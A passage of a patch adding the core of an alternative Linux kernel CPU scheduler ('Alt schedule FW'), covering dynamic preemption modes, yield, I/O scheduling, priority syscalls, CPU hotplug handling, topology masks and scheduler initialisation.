++	/*
++	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
++	 * the ZERO state, which is invalid.
++	 */
++	preempt_dynamic_enable(cond_resched);
++	preempt_dynamic_enable(might_resched);
++	preempt_dynamic_enable(preempt_schedule);
++	preempt_dynamic_enable(preempt_schedule_notrace);
++	preempt_dynamic_enable(irqentry_exit_cond_resched);
++
++	switch (mode) {
++	case preempt_dynamic_none:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: none\n");
++		break;
++
++	case preempt_dynamic_voluntary:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_enable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: voluntary\n");
++		break;
++
++	case preempt_dynamic_full:
++		preempt_dynamic_disable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_enable(preempt_schedule);
++		preempt_dynamic_enable(preempt_schedule_notrace);
++		preempt_dynamic_enable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: full\n");
++		break;
++	}
++
++	preempt_dynamic_mode = mode;
++}
++
++static int __init setup_preempt_mode(char *str)
++{
++	int mode = sched_dynamic_mode(str);
++	if (mode < 0) {
++		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
++		return 0;
++	}
++
++	sched_dynamic_update(mode);
++	return 1;
++}
++__setup("preempt=", setup_preempt_mode);
++
++static void __init preempt_dynamic_init(void)
++{
++	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
++		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
++			sched_dynamic_update(preempt_dynamic_none);
++		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
++			sched_dynamic_update(preempt_dynamic_voluntary);
++		} else {
++			/* Default static call setting, nothing to do */
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
++			preempt_dynamic_mode = preempt_dynamic_full;
++			pr_info("Dynamic Preempt: full\n");
++		}
++	}
++}
++
++#define PREEMPT_MODEL_ACCESSOR(mode) \
++	bool preempt_model_##mode(void)						 \
++	{									 \
++		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
++		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
++	}									 \
++	EXPORT_SYMBOL_GPL(preempt_model_##mode)
++
++PREEMPT_MODEL_ACCESSOR(none);
++PREEMPT_MODEL_ACCESSOR(voluntary);
++PREEMPT_MODEL_ACCESSOR(full);
++
++#else /* !CONFIG_PREEMPT_DYNAMIC */
++
++static inline void preempt_dynamic_init(void) { }
++
++#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
++
++/**
++ * yield - yield the current processor to other threads.
++ *
++ * Do not ever use this function, there's a 99% chance you're doing it wrong.
++ *
++ * The scheduler is at all times free to pick the calling task as the most
++ * eligible task to run, if removing the yield() call from your code breaks
++ * it, it's already broken.
++ *
++ * Typical broken usage is:
++ *
++ * while (!event)
++ * 	yield();
++ *
++ * where one assumes that yield() will let 'the other' process run that will
++ * make event true. If the current task is a SCHED_FIFO task that will never
++ * happen. Never use yield() as a progress guarantee!!
++ *
++ * If you want to use yield() to wait for something, use wait_event().
++ * If you want to use yield() to be 'nice' for others, use cond_resched().
++ * If you still want to use yield(), do not!
++ */
++void __sched yield(void)
++{
++	set_current_state(TASK_RUNNING);
++	do_sched_yield();
++}
++EXPORT_SYMBOL(yield);
++
++/**
++ * yield_to - yield the current processor to another thread in
++ * your thread group, or accelerate that thread toward the
++ * processor it's on.
++ * @p: target task
++ * @preempt: whether task preemption is allowed or not
++ *
++ * It's the caller's job to ensure that the target task struct
++ * can't go away on us before we can do any checks.
++ *
++ * In Alt schedule FW, yield_to is not supported.
++ *
++ * Return:
++ *	true (>0) if we indeed boosted the target task.
++ *	false (0) if we failed to boost the target.
++ *	-ESRCH if there's no task to yield to.
++ */
++int __sched yield_to(struct task_struct *p, bool preempt)
++{
++	return 0;
++}
++EXPORT_SYMBOL_GPL(yield_to);
++
++int io_schedule_prepare(void)
++{
++	int old_iowait = current->in_iowait;
++
++	current->in_iowait = 1;
++	blk_flush_plug(current->plug, true);
++	return old_iowait;
++}
++
++void io_schedule_finish(int token)
++{
++	current->in_iowait = token;
++}
++
++/*
++ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
++ * that process accounting knows that this is a task in IO wait state.
++ *
++ * But don't do that if it is a deliberate, throttling IO wait (this task
++ * has set its backing_dev_info: the queue against which it should throttle)
++ */
++
++long __sched io_schedule_timeout(long timeout)
++{
++	int token;
++	long ret;
++
++	token = io_schedule_prepare();
++	ret = schedule_timeout(timeout);
++	io_schedule_finish(token);
++
++	return ret;
++}
++EXPORT_SYMBOL(io_schedule_timeout);
++
++void __sched io_schedule(void)
++{
++	int token;
++
++	token = io_schedule_prepare();
++	schedule();
++	io_schedule_finish(token);
++}
++EXPORT_SYMBOL(io_schedule);
++
++/**
++ * sys_sched_get_priority_max - return maximum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the maximum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = MAX_RT_PRIO - 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++/**
++ * sys_sched_get_priority_min - return minimum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the minimum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
++{
++	struct task_struct *p;
++	int retval;
++
++	alt_sched_debug();
++
++	if (pid < 0)
++		return -EINVAL;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++	rcu_read_unlock();
++
++	*t = ns_to_timespec64(sched_timeslice_ns);
++	return 0;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/**
++ * sys_sched_rr_get_interval - return the default timeslice of a process.
++ * @pid: pid of the process.
++ * @interval: userspace pointer to the timeslice value.
++ *
++ *
++ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
++ * an error code.
++ */
++SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
++		struct __kernel_timespec __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_timespec64(&t, interval);
++
++	return retval;
++}
++
++#ifdef CONFIG_COMPAT_32BIT_TIME
++SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
++		struct old_timespec32 __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_old_timespec32(&t, interval);
++	return retval;
++}
++#endif
++
++void sched_show_task(struct task_struct *p)
++{
++	unsigned long free = 0;
++	int ppid;
++
++	if (!try_get_task_stack(p))
++		return;
++
++	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
++
++	if (task_is_running(p))
++		pr_cont("  running task    ");
++#ifdef CONFIG_DEBUG_STACK_USAGE
++	free = stack_not_used(p);
++#endif
++	ppid = 0;
++	rcu_read_lock();
++	if (pid_alive(p))
++		ppid = task_pid_nr(rcu_dereference(p->real_parent));
++	rcu_read_unlock();
++	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
++		free, task_pid_nr(p), ppid,
++		read_task_thread_flags(p));
++
++	print_worker_info(KERN_INFO, p);
++	print_stop_info(KERN_INFO, p);
++	show_stack(p, NULL, KERN_INFO);
++	put_task_stack(p);
++}
++EXPORT_SYMBOL_GPL(sched_show_task);
++
++static inline bool
++state_filter_match(unsigned long state_filter, struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/* no filter, everything matches */
++	if (!state_filter)
++		return true;
++
++	/* filter, but doesn't match */
++	if (!(state & state_filter))
++		return false;
++
++	/*
++	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
++	 * TASK_KILLABLE).
++	 */
++	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
++		return false;
++
++	return true;
++}
++
++
++void show_state_filter(unsigned int state_filter)
++{
++	struct task_struct *g, *p;
++
++	rcu_read_lock();
++	for_each_process_thread(g, p) {
++		/*
++		 * reset the NMI-timeout, listing all files on a slow
++		 * console might take a lot of time:
++		 * Also, reset softlockup watchdogs on all CPUs, because
++		 * another CPU might be blocked waiting for us to process
++		 * an IPI.
++		 */
++		touch_nmi_watchdog();
++		touch_all_softlockup_watchdogs();
++		if (state_filter_match(state_filter, p))
++			sched_show_task(p);
++	}
++
++#ifdef CONFIG_SCHED_DEBUG
++	/* TODO: Alt schedule FW should support this
++	if (!state_filter)
++		sysrq_sched_debug_show();
++	*/
++#endif
++	rcu_read_unlock();
++	/*
++	 * Only show locks if all tasks are dumped:
++	 */
++	if (!state_filter)
++		debug_show_all_locks();
++}
++
++void dump_cpu_task(int cpu)
++{
++	if (cpu == smp_processor_id() && in_hardirq()) {
++		struct pt_regs *regs;
++
++		regs = get_irq_regs();
++		if (regs) {
++			show_regs(regs);
++			return;
++		}
++	}
++
++	if (trigger_single_cpu_backtrace(cpu))
++		return;
++
++	pr_info("Task dump for CPU %d:\n", cpu);
++	sched_show_task(cpu_curr(cpu));
++}
++
++/**
++ * init_idle - set up an idle thread for a given CPU
++ * @idle: task in question
++ * @cpu: CPU the idle task belongs to
++ *
++ * NOTE: this function does not set the idle thread's NEED_RESCHED
++ * flag, to make booting more robust.
++ */
++void __init init_idle(struct task_struct *idle, int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	__sched_fork(0, idle);
++
++	raw_spin_lock_irqsave(&idle->pi_lock, flags);
++	raw_spin_lock(&rq->lock);
++
++	idle->last_ran = rq->clock_task;
++	idle->__state = TASK_RUNNING;
++	/*
++	 * PF_KTHREAD should already be set at this point; regardless, make it
++	 * look like a proper per-CPU kthread.
++	 */
++	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	kthread_set_per_cpu(idle, cpu);
++
++	sched_queue_init_idle(&rq->queue, idle);
++
++#ifdef CONFIG_SMP
++	/*
++	 * It's possible that init_idle() gets called multiple times on a task,
++	 * in that case do_set_cpus_allowed() will not do the right thing.
++	 *
++	 * And since this is boot we can forgo the serialisation.
++	 */
++	set_cpus_allowed_common(idle, cpumask_of(cpu));
++#endif
++
++	/* Silence PROVE_RCU */
++	rcu_read_lock();
++	__set_task_cpu(idle, cpu);
++	rcu_read_unlock();
++
++	rq->idle = idle;
++	rcu_assign_pointer(rq->curr, idle);
++	idle->on_cpu = 1;
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
++
++	/* Set the preempt count _outside_ the spinlocks! */
++	init_idle_preempt_count(idle, cpu);
++
++	ftrace_graph_init_idle_task(idle, cpu);
++	vtime_init_idle(idle, cpu);
++#ifdef CONFIG_SMP
++	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
++			      const struct cpumask __maybe_unused *trial)
++{
++	return 1;
++}
++
++int task_can_attach(struct task_struct *p,
++		    const struct cpumask *cs_effective_cpus)
++{
++	int ret = 0;
++
++	/*
++	 * Kthreads which disallow setaffinity shouldn't be moved
++	 * to a new cpuset; we don't want to change their CPU
++	 * affinity and isolating such threads by their set of
++	 * allowed nodes is unnecessary.  Thus, cpusets are not
++	 * applicable for such threads.  This prevents checking for
++	 * success of set_cpus_allowed_ptr() on all attached tasks
++	 * before cpus_mask may be changed.
++	 */
++	if (p->flags & PF_NO_SETAFFINITY)
++		ret = -EINVAL;
++
++	return ret;
++}
++
++bool sched_smp_initialized __read_mostly;
++
++#ifdef CONFIG_HOTPLUG_CPU
++/*
++ * Ensures that the idle task is using init_mm right before its CPU goes
++ * offline.
++ */
++void idle_task_exit(void)
++{
++	struct mm_struct *mm = current->active_mm;
++
++	BUG_ON(current != this_rq()->idle);
++
++	if (mm != &init_mm) {
++		switch_mm(mm, &init_mm, current);
++		finish_arch_post_lock_switch();
++	}
++
++	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
++}
++
++static int __balance_push_cpu_stop(void *arg)
++{
++	struct task_struct *p = arg;
++	struct rq *rq = this_rq();
++	struct rq_flags rf;
++	int cpu;
++
++	raw_spin_lock_irq(&p->pi_lock);
++	rq_lock(rq, &rf);
++
++	update_rq_clock(rq);
++
++	if (task_rq(p) == rq && task_on_rq_queued(p)) {
++		cpu = select_fallback_rq(rq->cpu, p);
++		rq = __migrate_task(rq, p, cpu);
++	}
++
++	rq_unlock(rq, &rf);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	put_task_struct(p);
++
++	return 0;
++}
++
++static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
++
++/*
++ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but only
++ * effective when the hotplug motion is down.
++ */
++static void balance_push(struct rq *rq)
++{
++	struct task_struct *push_task = rq->curr;
++
++	lockdep_assert_held(&rq->lock);
++
++	/*
++	 * Ensure the thing is persistent until balance_push_set(.on = false);
++	 */
++	rq->balance_callback = &balance_push_callback;
++
++	/*
++	 * Only active while going offline and when invoked on the outgoing
++	 * CPU.
++	 */
++	if (!cpu_dying(rq->cpu) || rq != this_rq())
++		return;
++
++	/*
++	 * Both the cpu-hotplug and stop task are in this case and are
++	 * required to complete the hotplug process.
++	 */
++	if (kthread_is_per_cpu(push_task) ||
++	    is_migration_disabled(push_task)) {
++
++		/*
++		 * If this is the idle task on the outgoing CPU try to wake
++		 * up the hotplug control thread which might wait for the
++		 * last task to vanish. The rcuwait_active() check is
++		 * accurate here because the waiter is pinned on this CPU
++		 * and can't obviously be running in parallel.
++		 *
++		 * On RT kernels this also has to check whether there are
++		 * pinned and scheduled out tasks on the runqueue. They
++		 * need to leave the migrate disabled section first.
++		 */
++		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
++		    rcuwait_active(&rq->hotplug_wait)) {
++			raw_spin_unlock(&rq->lock);
++			rcuwait_wake_up(&rq->hotplug_wait);
++			raw_spin_lock(&rq->lock);
++		}
++		return;
++	}
++
++	get_task_struct(push_task);
++	/*
++	 * Temporarily drop rq->lock such that we can wake-up the stop task.
++	 * Both preemption and IRQs are still disabled.
++	 */
++	raw_spin_unlock(&rq->lock);
++	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
++			    this_cpu_ptr(&push_work));
++	/*
++	 * At this point need_resched() is true and we'll take the loop in
++	 * schedule(). The next pick is obviously going to be the stop task
++	 * which kthread_is_per_cpu() and will push this task away.
++	 */
++	raw_spin_lock(&rq->lock);
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++	struct rq *rq = cpu_rq(cpu);
++	struct rq_flags rf;
++
++	rq_lock_irqsave(rq, &rf);
++	if (on) {
++		WARN_ON_ONCE(rq->balance_callback);
++		rq->balance_callback = &balance_push_callback;
++	} else if (rq->balance_callback == &balance_push_callback) {
++		rq->balance_callback = NULL;
++	}
++	rq_unlock_irqrestore(rq, &rf);
++}
++
++/*
++ * Invoked from a CPUs hotplug control thread after the CPU has been marked
++ * inactive. All tasks which are not per CPU kernel threads are either
++ * pushed off this CPU now via balance_push() or placed on a different CPU
++ * during wakeup. Wait until the CPU is quiescent.
++ */
++static void balance_hotplug_wait(void)
++{
++	struct rq *rq = this_rq();
++
++	rcuwait_wait_event(&rq->hotplug_wait,
++			   rq->nr_running == 1 && !rq_has_pinned_tasks(rq),
++			   TASK_UNINTERRUPTIBLE);
++}
++
++#else
++
++static void balance_push(struct rq *rq)
++{
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++}
++
++static inline void balance_hotplug_wait(void)
++{
++}
++#endif /* CONFIG_HOTPLUG_CPU */
++
++static void set_rq_offline(struct rq *rq)
++{
++	if (rq->online)
++		rq->online = false;
++}
++
++static void set_rq_online(struct rq *rq)
++{
++	if (!rq->online)
++		rq->online = true;
++}
++
++/*
++ * used to mark begin/end of suspend/resume:
++ */
++static int num_cpus_frozen;
++
++/*
++ * Update cpusets according to cpu_active mask.  If cpusets are
++ * disabled, cpuset_update_active_cpus() becomes a simple wrapper
++ * around partition_sched_domains().
++ *
++ * If we come here as part of a suspend/resume, don't touch cpusets because we
++ * want to restore it back to its original state upon resume anyway.
++ */
++static void cpuset_cpu_active(void)
++{
++	if (cpuhp_tasks_frozen) {
++		/*
++		 * num_cpus_frozen tracks how many CPUs are involved in suspend
++		 * resume sequence. As long as this is not the last online
++		 * operation in the resume sequence, just build a single sched
++		 * domain, ignoring cpusets.
++		 */
++		partition_sched_domains(1, NULL, NULL);
++		if (--num_cpus_frozen)
++			return;
++		/*
++		 * This is the last CPU online operation. So fall through and
++		 * restore the original sched domains by considering the
++		 * cpuset configurations.
++		 */
++		cpuset_force_rebuild();
++	}
++
++	cpuset_update_active_cpus();
++}
++
++static int cpuset_cpu_inactive(unsigned int cpu)
++{
++	if (!cpuhp_tasks_frozen) {
++		cpuset_update_active_cpus();
++	} else {
++		num_cpus_frozen++;
++		partition_sched_domains(1, NULL, NULL);
++	}
++	return 0;
++}
++
++int sched_cpu_activate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/*
++	 * Clear the balance_push callback and prepare to schedule
++	 * regular tasks.
++	 */
++	balance_push_set(cpu, false);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going up, increment the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
++		static_branch_inc_cpuslocked(&sched_smt_present);
++#endif
++	set_cpu_active(cpu, true);
++
++	if (sched_smp_initialized)
++		cpuset_cpu_active();
++
++	/*
++	 * Put the rq online, if not already. This happens:
++	 *
++	 * 1) In the early boot process, because we build the real domains
++	 *    after all cpus have been brought up.
++	 *
++	 * 2) At runtime, if cpuset_cpu_active() fails to rebuild the
++	 *    domains.
++	 */
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	set_rq_online(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	return 0;
++}
++
++int sched_cpu_deactivate(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++	int ret;
++
++	set_cpu_active(cpu, false);
++
++	/*
++	 * From this point forward, this CPU will refuse to run any task that
++	 * is not: migrate_disable() or KTHREAD_IS_PER_CPU, and will actively
++	 * push those tasks away until this gets cleared, see
++	 * sched_cpu_dying().
++	 */
++	balance_push_set(cpu, true);
++
++	/*
++	 * We've cleared cpu_active_mask, wait for all preempt-disabled and RCU
++	 * users of this state to go away such that all new such users will
++	 * observe it.
++	 *
++	 * Specifically, we rely on ttwu to no longer target this CPU, see
++	 * ttwu_queue_cond() and is_cpu_allowed().
++	 *
++	 * Do sync before park smpboot threads to take care the rcu boost case.
++	 */
++	synchronize_rcu();
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	update_rq_clock(rq);
++	set_rq_offline(rq);
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++#ifdef CONFIG_SCHED_SMT
++	/*
++	 * When going down, decrement the number of cores with SMT present.
++	 */
++	if (cpumask_weight(cpu_smt_mask(cpu)) == 2) {
++		static_branch_dec_cpuslocked(&sched_smt_present);
++		if (!static_branch_likely(&sched_smt_present))
++			cpumask_clear(&sched_sg_idle_mask);
++	}
++#endif
++
++	if (!sched_smp_initialized)
++		return 0;
++
++	ret = cpuset_cpu_inactive(cpu);
++	if (ret) {
++		balance_push_set(cpu, false);
++		set_cpu_active(cpu, true);
++		return ret;
++	}
++
++	return 0;
++}
++
++static void sched_rq_cpu_starting(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++
++	rq->calc_load_update = calc_load_update;
++}
++
++int sched_cpu_starting(unsigned int cpu)
++{
++	sched_rq_cpu_starting(cpu);
++	sched_tick_start(cpu);
++	return 0;
++}
++
++#ifdef CONFIG_HOTPLUG_CPU
++
++/*
++ * Invoked immediately before the stopper thread is invoked to bring the
++ * CPU down completely. At this point all per CPU kthreads except the
++ * hotplug thread (current) and the stopper thread (inactive) have been
++ * either parked or have been unbound from the outgoing CPU. Ensure that
++ * any of those which might be on the way out are gone.
++ *
++ * If after this point a bound task is being woken on this CPU then the
++ * responsible hotplug callback has failed to do it's job.
++ * sched_cpu_dying() will catch it with the appropriate fireworks.
++ */
++int sched_cpu_wait_empty(unsigned int cpu)
++{
++	balance_hotplug_wait();
++	return 0;
++}
++
++/*
++ * Since this CPU is going 'away' for a while, fold any nr_active delta we
++ * might have. Called from the CPU stopper task after ensuring that the
++ * stopper is the last running task on the CPU, so nr_active count is
++ * stable. We need to take the teardown thread which is calling this into
++ * account, so we hand in adjust = 1 to the load calculation.
++ *
++ * Also see the comment "Global load-average calculations".
++ */
++static void calc_load_migrate(struct rq *rq)
++{
++	long delta = calc_load_fold_active(rq, 1);
++
++	if (delta)
++		atomic_long_add(delta, &calc_load_tasks);
++}
++
++static void dump_rq_tasks(struct rq *rq, const char *loglvl)
++{
++	struct task_struct *g, *p;
++	int cpu = cpu_of(rq);
++
++	lockdep_assert_held(&rq->lock);
++
++	printk("%sCPU%d enqueued tasks (%u total):\n", loglvl, cpu, rq->nr_running);
++	for_each_process_thread(g, p) {
++		if (task_cpu(p) != cpu)
++			continue;
++
++		if (!task_on_rq_queued(p))
++			continue;
++
++		printk("%s\tpid: %d, name: %s\n", loglvl, p->pid, p->comm);
++	}
++}
++
++int sched_cpu_dying(unsigned int cpu)
++{
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	/* Handle pending wakeups and then migrate everything off */
++	sched_tick_stop(cpu);
++
++	raw_spin_lock_irqsave(&rq->lock, flags);
++	if (rq->nr_running != 1 || rq_has_pinned_tasks(rq)) {
++		WARN(true, "Dying CPU not properly vacated!");
++		dump_rq_tasks(rq, KERN_WARNING);
++	}
++	raw_spin_unlock_irqrestore(&rq->lock, flags);
++
++	calc_load_migrate(rq);
++	hrtick_clear(rq);
++	return 0;
++}
++#endif
++
++#ifdef CONFIG_SMP
++static void sched_init_topology_cpumask_early(void)
++{
++	int cpu;
++	cpumask_t *tmp;
++
++	for_each_possible_cpu(cpu) {
++		/* init topo masks */
++		tmp = per_cpu(sched_cpu_topo_masks, cpu);
++
++		cpumask_copy(tmp, cpumask_of(cpu));
++		tmp++;
++		cpumask_copy(tmp, cpu_possible_mask);
++		per_cpu(sched_cpu_llc_mask, cpu) = tmp;
++		per_cpu(sched_cpu_topo_end_mask, cpu) = ++tmp;
++		/*per_cpu(sd_llc_id, cpu) = cpu;*/
++	}
++}
++
++#define TOPOLOGY_CPUMASK(name, mask, last)\
++	if (cpumask_and(topo, topo, mask)) {					\
++		cpumask_copy(topo, mask);					\
++		printk(KERN_INFO "sched: cpu#%02d topo: 0x%08lx - "#name,	\
++		       cpu, (topo++)->bits[0]);					\
++	}									\
++	if (!last)								\
++		cpumask_complement(topo, mask)
++
++static void sched_init_topology_cpumask(void)
++{
++	int cpu;
++	cpumask_t *topo;
++
++	for_each_online_cpu(cpu) {
++		/* take chance to reset time slice for idle tasks */
++		cpu_rq(cpu)->idle->time_slice = sched_timeslice_ns;
++
++		topo = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++
++		cpumask_complement(topo, cpumask_of(cpu));
++#ifdef CONFIG_SCHED_SMT
++		TOPOLOGY_CPUMASK(smt, topology_sibling_cpumask(cpu), false);
++#endif
++		per_cpu(sd_llc_id, cpu) = cpumask_first(cpu_coregroup_mask(cpu));
++		per_cpu(sched_cpu_llc_mask, cpu) = topo;
++		TOPOLOGY_CPUMASK(coregroup, cpu_coregroup_mask(cpu), false);
++
++		TOPOLOGY_CPUMASK(core, topology_core_cpumask(cpu), false);
++
++		TOPOLOGY_CPUMASK(others, cpu_online_mask, true);
++
++		per_cpu(sched_cpu_topo_end_mask, cpu) = topo;
++		printk(KERN_INFO "sched: cpu#%02d llc_id = %d, llc_mask idx = %d\n",
++		       cpu, per_cpu(sd_llc_id, cpu),
++		       (int) (per_cpu(sched_cpu_llc_mask, cpu) -
++			      per_cpu(sched_cpu_topo_masks, cpu)));
++	}
++}
++#endif
++
++void __init sched_init_smp(void)
++{
++	/* Move init over to a non-isolated CPU */
++	if (set_cpus_allowed_ptr(current, housekeeping_cpumask(HK_TYPE_DOMAIN)) < 0)
++		BUG();
++	current->flags &= ~PF_NO_SETAFFINITY;
++
++	sched_init_topology_cpumask();
++
++	sched_smp_initialized = true;
++}
++#else
++void __init sched_init_smp(void)
++{
++	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
++}
++#endif /* CONFIG_SMP */
++
++int in_sched_functions(unsigned long addr)
++{
++	return in_lock_functions(addr) ||
++		(addr >= (unsigned long)__sched_text_start
++		&& addr < (unsigned long)__sched_text_end);
++}
++
++#ifdef CONFIG_CGROUP_SCHED
++/* task group related information */
++struct task_group {
++	struct cgroup_subsys_state css;
++
++	struct rcu_head rcu;
++	struct list_head list;
++
++	struct task_group *parent;
++	struct list_head siblings;
++	struct list_head children;
++#ifdef CONFIG_FAIR_GROUP_SCHED
++	unsigned long		shares;
++#endif
++};
++
++/*
++ * Default task group.
++ * Every task in system belongs to this group at bootup.
++ */
++struct task_group root_task_group;
++LIST_HEAD(task_groups);
++
++/* Cacheline aligned slab cache for task_group */
++static struct kmem_cache *task_group_cache __read_mostly;
++#endif /* CONFIG_CGROUP_SCHED */
++
++void __init sched_init(void)
++{
++	int i;
++	struct rq *rq;
++
++	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
++
++	wait_bit_init();
++
++#ifdef CONFIG_SMP
++	for (i = 0; i < SCHED_QUEUE_BITS; i++)
++		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
++#endif
++
++#ifdef CONFIG_CGROUP_SCHED
++	task_group_cache = KMEM_CACHE(task_group, 0);
++
++	list_add(&root_task_group.list, &task_groups);
++	INIT_LIST_HEAD(&root_task_group.children);
++	INIT_LIST_HEAD(&root_task_group.siblings);
++#endif /* CONFIG_CGROUP_SCHED */
++	for_each_possible_cpu(i) {
++		rq = cpu_rq(i);
++
++		sched_queue_init(&rq->queue);
++		rq->prio = IDLE_TASK_SCHED_PRIO;
++		rq->skip = NULL;
++
++		raw_spin_lock_init(&rq->lock);
++		rq->nr_running = rq->nr_uninterruptible = 0;
++		rq->calc_load_active = 0;
++		rq->calc_load_update = jiffies + LOAD_FREQ;
++#ifdef CONFIG_SMP
++		rq->online = false;
++		rq->cpu = i;
++
++#ifdef CONFIG_SCHED_SMT
++		rq->active_balance = 0;
++#endif
++
++#ifdef CONFIG_NO_HZ_COMMON
++		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
++#endif
++		rq->balance_callback = &balance_push_callback;
++#ifdef CONFIG_HOTPLUG_CPU
++		rcuwait_init(&rq->hotplug_wait);
++#endif
++#endif /* CONFIG_SMP */
++		rq->nr_switches = 0;
++
++		hrtick_rq_init(rq);
++		atomic_set(&rq->nr_iowait, 0);
++	}
++#ifdef CONFIG_SMP
++	/* Set rq->online for cpu 0 */
++	cpu_rq(0)->online = true;
++#endif
++	/*
++	 * The boot idle thread does lazy MMU switching as well:
++	 */
++	mmgrab(&init_mm);
++	enter_lazy_tlb(&init_mm, current);
++
++	/*
++	 * The idle task doesn't need the kthread struct to function, but it
++	 * is dressed up as a per-CPU kthread and thus needs to play the part
++	 * if we want to avoid special-casing it in code that deals with per-CPU
++	 * kthreads.
++	 */
++	WARN_ON(!set_kthread_struct(current));
++
++	/*
++	 * Make us the idle thread. Technically, schedule() should not be
++	 * called from this thread, however somewhere below it might be,
++	 * but because we are the idle thread, we just pick up running again
++	 * when this runqueue becomes "idle".
++	 */
++	init_idle(current, smp_processor_id());
++
++	calc_load_update = jiffies + LOAD_FREQ;
++
++#ifdef CONFIG_SMP
++	idle_thread_set_boot_cpu();
++	balance_push_set(smp_processor_id(), false);
++
++	sched_init_topology_cpumask_early();
++#endif /* SMP */
++
++	psi_init();
++
++	preempt_dynamic_init();
++}
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++
++void __might_sleep(const char *file, int line)
++{
++	unsigned int state = get_current_state();
++	/*
++	 * Blocking primitives will set (and therefore destroy) current->state,
++	 * since we will exit with TASK_RUNNING make sure we enter with it,
++	 * otherwise we will destroy state.
++	 */
++	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
++			"do not call blocking ops when !TASK_RUNNING; "
